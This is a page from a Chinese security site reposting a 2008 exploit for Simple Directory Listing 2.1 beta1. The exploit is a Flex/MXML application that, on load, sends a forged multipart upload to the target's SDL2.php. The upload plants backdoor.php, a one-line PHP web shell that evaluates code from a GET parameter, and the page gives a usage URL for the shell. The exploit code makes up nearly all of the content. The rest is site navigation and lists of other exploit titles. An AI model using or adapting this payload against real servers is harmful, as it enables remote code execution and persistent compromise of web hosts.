首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Simple Directory Listing 2 Cross Site File Upload Vulnerability 来源：www.vfcocus.net 作者：Brooks 发布时间：2008-12-09   Simple Directory Listing 2 - Cross Site File Upload -------------------------------------------------------------------------------- <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()"> <mx:Script> /*  Written by Michael Brooks VUlerablity type: Cross Site File Upload. Affects: SDL 2.1 beta1 Product homepage: http://simpledirectorylisting.net/ SDL has 22+ million downloads from sourceforge.net! The top three php projects where hacked in one day using . Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial) uploads ./backdoor.php in the same directory as SDL2.php Backdoor Useage: http://10.1.1.155/backdoor.php?e=phpinfo(); backdoor code: <?php eval($_GET[e])?> More info on Cross Site File Upload Attacks: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/ Inspired by the work of Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void{ var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&amp;module=ModuleUpload&amp;moduleParams[action]=upload&amp;moduleParams[cwdRelPath]="); request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));       request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A'); request.method = URLRequestMethod.POST;     navigateToURL(request, '_self'); } </mx:Script> </mx:Application>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phpMyAdmin 3.1.0 (XSRF) SQL In ·XAMPP 1.6.8 (XSRF) Change Admi ·SIU Guarani Multiple Remote Vu ·phpBB 3 (Mod Tag Board <= 4) R ·MG2 0.5.1 (filename) Remote Co ·Neostrada Livebox Router Remot ·DD-WRT v24-sp1 (XSRF) Cross Si ·w3blabor CMS 3.0.5 Arbitrary F ·PayPal eStore Admin Password C ·Bonza Cart <= 1.10 Admin Passw ·linux x86 shellcode obfuscator ·DL PayCart <= 1.34 Admin Passw   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved